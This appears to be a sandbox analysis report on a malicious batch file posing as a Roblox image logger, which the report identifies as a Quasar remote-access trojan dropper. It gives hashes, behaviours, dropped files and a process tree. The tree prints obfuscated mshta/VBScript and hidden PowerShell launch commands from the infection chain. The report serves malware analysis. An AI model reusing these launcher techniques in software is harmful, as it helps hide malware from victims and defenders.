Analysis
- max time kernel: 29s
- max time network: 30s
- platform: windows11-21h2_x64
- resource: win11-20240221-en
- resource tags: arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 05/04/2024, 21:03
Static task
static1
General
- Target: Roblox-Image-Logger.bat
- Size: 14.9MB
- MD5: 922173bce190a729a7541904e53ffba5
- SHA1: d98240a8deb45581eb15e1ec4d5238f914bee80d
- SHA256: bce1a795abd87b0db2ea2577de28ade5f46d275e47f0424fbcd728684f939c0b
- SHA512: 1b4cad22fe047018dc95825b7faaa21b0b0936f1de85886abbf5ca85b59d5fab8da35921758df62fe614e5473b664e6000a95218615bfbd41938149a07e81f5f
- SSDEEP: 49152:hx3AG5hYogP5o/nsX9xf0HFVpg0bozDhNr2IhX25cDX591URFiVmjGrEcg9FKdzt:g
Malware Config
Extracted: quasar
- reconnect_delay: 1000
Signatures
- Quasar payload (1 IoC)
  resource | yara_rule
  behavioral1/memory/1528-90-0x000002A066600000-0x000002A066DAA000-memory.dmp | family_quasar
- Deletes itself (1 IoC)
  pid | Process
  444 | powershell.exe
- Executes dropped EXE (3 IoCs)
  pid | Process
  4056 | $sxr-mshta.exe
  2332 | $sxr-cmd.exe
  1528 | $sxr-powershell.exe
- Drops file in Windows directory (6 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\$sxr-cmd.exe | powershell.exe
  File created | C:\Windows\$sxr-powershell.exe | powershell.exe
  File opened for modification | C:\Windows\$sxr-powershell.exe | powershell.exe
  File created | C:\Windows\$sxr-mshta.exe | powershell.exe
  File opened for modification | C:\Windows\$sxr-mshta.exe | powershell.exe
  File created | C:\Windows\$sxr-cmd.exe | powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | $sxr-mshta.exe
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid | Process
  444 | powershell.exe (6 entries)
  1528 | $sxr-powershell.exe (6 entries)
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 444 | powershell.exe (3 entries)
  Token: SeDebugPrivilege | 1528 | $sxr-powershell.exe (3 entries)
- Suspicious use of WriteProcessMemory (35 IoCs)
  description | pid | Process | procid_target
  PID 2168 wrote to memory of 3360 | 2168 | cmd.exe | 77 (2 entries)
  PID 2168 wrote to memory of 444 | 2168 | cmd.exe | 78 (2 entries)
  PID 4056 wrote to memory of 2332 | 4056 | $sxr-mshta.exe | 81 (2 entries)
  PID 2332 wrote to memory of 3904 | 2332 | $sxr-cmd.exe | 83 (2 entries)
  PID 2332 wrote to memory of 1528 | 2332 | $sxr-cmd.exe | 84 (2 entries)
  PID 1528 wrote to memory of 692 | 1528 | $sxr-powershell.exe | 7
  PID 1528 wrote to memory of 1000 | 1528 | $sxr-powershell.exe | 12
  PID 1528 wrote to memory of 468 | 1528 | $sxr-powershell.exe | 14
  PID 1528 wrote to memory of 1028 | 1528 | $sxr-powershell.exe | 15
  PID 1528 wrote to memory of 1100 | 1528 | $sxr-powershell.exe | 17
  PID 1528 wrote to memory of 1108 | 1528 | $sxr-powershell.exe | 18
  PID 1528 wrote to memory of 1176 | 1528 | $sxr-powershell.exe | 19
  PID 1528 wrote to memory of 1220 | 1528 | $sxr-powershell.exe | 20
  PID 1528 wrote to memory of 1268 | 1528 | $sxr-powershell.exe | 21
  PID 1528 wrote to memory of 1304 | 1528 | $sxr-powershell.exe | 22
  PID 1528 wrote to memory of 1360 | 1528 | $sxr-powershell.exe | 23
  PID 1528 wrote to memory of 1504 | 1528 | $sxr-powershell.exe | 24
  PID 1528 wrote to memory of 1576 | 1528 | $sxr-powershell.exe | 25
  PID 1528 wrote to memory of 1616 | 1528 | $sxr-powershell.exe | 26
  PID 1528 wrote to memory of 1628 | 1528 | $sxr-powershell.exe | 27
  PID 1528 wrote to memory of 1636 | 1528 | $sxr-powershell.exe | 28
  PID 1528 wrote to memory of 1728 | 1528 | $sxr-powershell.exe | 29
  PID 1528 wrote to memory of 1784 | 1528 | $sxr-powershell.exe | 30
  PID 1528 wrote to memory of 1828 | 1528 | $sxr-powershell.exe | 31
  PID 1528 wrote to memory of 1900 | 1528 | $sxr-powershell.exe | 32
  PID 1528 wrote to memory of 1956 | 1528 | $sxr-powershell.exe | 33
  PID 1528 wrote to memory of 1964 | 1528 | $sxr-powershell.exe | 34
  PID 1528 wrote to memory of 1340 | 1528 | $sxr-powershell.exe | 35
  PID 1528 wrote to memory of 2100 | 1528 | $sxr-powershell.exe | 36
  PID 1528 wrote to memory of 2120 | 1528 | $sxr-powershell.exe | 37
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\system32\lsass.exe (PID 692)
- C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM (PID 1000)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc (PID 468)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts (PID 1028)
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService (PID 1100)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc (PID 1108)
- C:\Windows\system32\svchost.exe -k LocalService -p -s nsi (PID 1176)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule (PID 1220)
  - C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-klxianqkZHcQWHMfaKQz4312:PmZbGOPN=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();" (PID 4056)
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    - "C:\Windows\$sxr-cmd.exe" /c %$sxr-klxianqkZHcQWHMfaKQz4312:PmZbGOPN=% (PID 2332)
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:yWIkQKjNdX; " (PID 3904)
      - C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass (PID 1528)
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
- C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm (PID 1268)
- C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc (PID 1304)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc (PID 1360)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager (PID 1504)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog (PID 1576)
- C:\Windows\system32\svchost.exe -k NetworkService -p (PID 1616)
- C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem (PID 1628)
- C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes (PID 1636)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS (PID 1728)
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder (PID 1784)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp (PID 1828)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p (PID 1900)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p (PID 1956)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p (PID 1964)
- C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection (PID 1340)
- C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository (PID 2100)
- C:\Windows\System32\spoolsv.exe (PID 2120)
- C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Roblox-Image-Logger.bat" (PID 2168)
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:wOTwUXbPCP; " (PID 3360)
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden (PID 444)
    - Deletes itself
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 62KB
  MD5: e566632d8956997225be604d026c9b39
  SHA1: 94a9aade75fffc63ed71404b630eca41d3ce130e
  SHA256: b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
  SHA512: f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 324KB
  MD5: c5db7b712f280c3ae4f731ad7d5ea171
  SHA1: e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
  SHA256: f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
  SHA512: bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
- Filesize: 32KB
  MD5: 356e04e106f6987a19938df67dea0b76
  SHA1: f2fd7cde5f97427e497dfb07b7f682149dc896fb
  SHA256: 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
  SHA512: df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd
- Filesize: 440KB
  MD5: 0e9ccd796e251916133392539572a374
  SHA1: eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
  SHA256: c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
  SHA512: e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d